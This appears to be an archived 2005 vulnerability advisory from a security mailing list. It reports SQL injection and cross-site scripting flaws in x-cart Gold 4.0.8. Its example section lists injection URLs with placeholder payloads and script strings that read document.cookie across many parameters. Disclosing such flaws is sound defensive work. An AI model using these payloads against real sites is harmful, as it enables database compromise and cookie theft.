Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Multiple vulnerabilities in x-cart Gold

from [CENSORED] Network Security [Permanent Link]
Subject: Multiple vulnerabilities in x-cart Gold
Date: 31 May 2005 03:38:16 -0000 


SVadvisory#7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                  Title: Multiple vulnerabilities in x-cart Gold 
            The program: x-cart Gold 
 The vulnerable version: 4.0.8 
               Homepage: www.x-cart.com 
 Vulnerability is found: 29.05.05 
              Has found: CENSORED / SVT / www.svt.nukleon.us 
===================================================================== 
The description. 
 
SQL - injections 
--------------- 
At research of a product the set Multiple vulnerabilities was revealed 
SQL-Injections. Vulnerability mentions practically all parameters. 
The first mistake has been found in parameter "cat". In a script 
There is no check of this parameter and at substitution of a symbol 
"'" Probably, to make SQL-an injection. Further the mistake has been 
found in Parameter "productid" as from - for absence of check on 
Special symbols, by transfer to this parameter of a symbol "'" occurs 
Mistake SQL, and script forwards automatically on page 
Speaking about a mistake. On this page the parameter "id" is visible to it 
We transfer a symbol "'" and as probably to make SQL - an injection. 
Further we look parameter "mode", at substitution Special symbols 
There is a mistake and probably to make SQL - an injection. We shall wound 
And parameter "section" in it it is possible to make SQL - an injection. 

XSS 
--------------- 
Vulnerability of type XSS can make in the same parameters as at mistakes 
SQL - injections 
=====================================================================
Example
^^^^^^^^^
SQL - injections
---------------
http://example/home.php?cat='[SQL-inj]
http://example/home.php?printable='[SQL-inj]
http://example/product.php?productid='[SQL-inj]
http://example/product.php?mode='[SQL-inj]
http://example/error_message.php?access_denied&id='[SQL-inj]
http://example/help.php?section='[SQL-inj]
http://example/orders.php?mode='[SQL-inj]
http://example/register.php?mode='[SQL-inj]
http://example/search.php?mode='[SQL-inj]
http://example/giftcert.php?gcid='[SQL-inj]
http://example/giftcert.php?gcindex='[SQL-inj]

XSS
---------------
http://example/home.php?cat='>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/home.php?printable='>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/product.php?productid='>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/product.php?mode='>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/error_message.php?access_denied&id='>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/help.php?section='>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/orders.php?mode='>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/register.php?mode='>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/search.php?mode='>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/giftcert.php?gcid='>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/giftcert.php?gcindex='>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
=====================================================================


The conclusion. 
^^^^^^^^^^^ 
Researches made only on version 4.0.8. Other versions as 
Can be vulnerable. The manufacturer in popularity is put. If is 
What that remarks write on censored@mail.ru 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Search Vulnerabilities Team / www.svt.nukleon.us /
CENSORED | Cash | Fredy | patr0n | Loader |
                                          ___
                                ___      /  /
                    ____________\__\___ /  /
                   |   _______________// _/_
               ____|__________   |\  \/ |   |
              /__________________| \____/   |
                                     ___|   |___
                                    |___     ___|
                                        |   |___
                                        |_______|
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Multiple vulnerabilities in x-cart Gold, CENSORED <=
Previous by Date:  MyBB 1.0 RC4 XSS Bug, August Christopher
Next by Date:  MDKSA-2005:095 - Updated gdb packages fix vulnerabilities, Mandriva Security Team
Previous by Thread:  MyBB 1.0 RC4 XSS Bug, August Christopher
Next by Thread:  MDKSA-2005:095 - Updated gdb packages fix vulnerabilities, Mandriva Security Team
Indexes:  [Date] [Thread] [Top] [All Lists]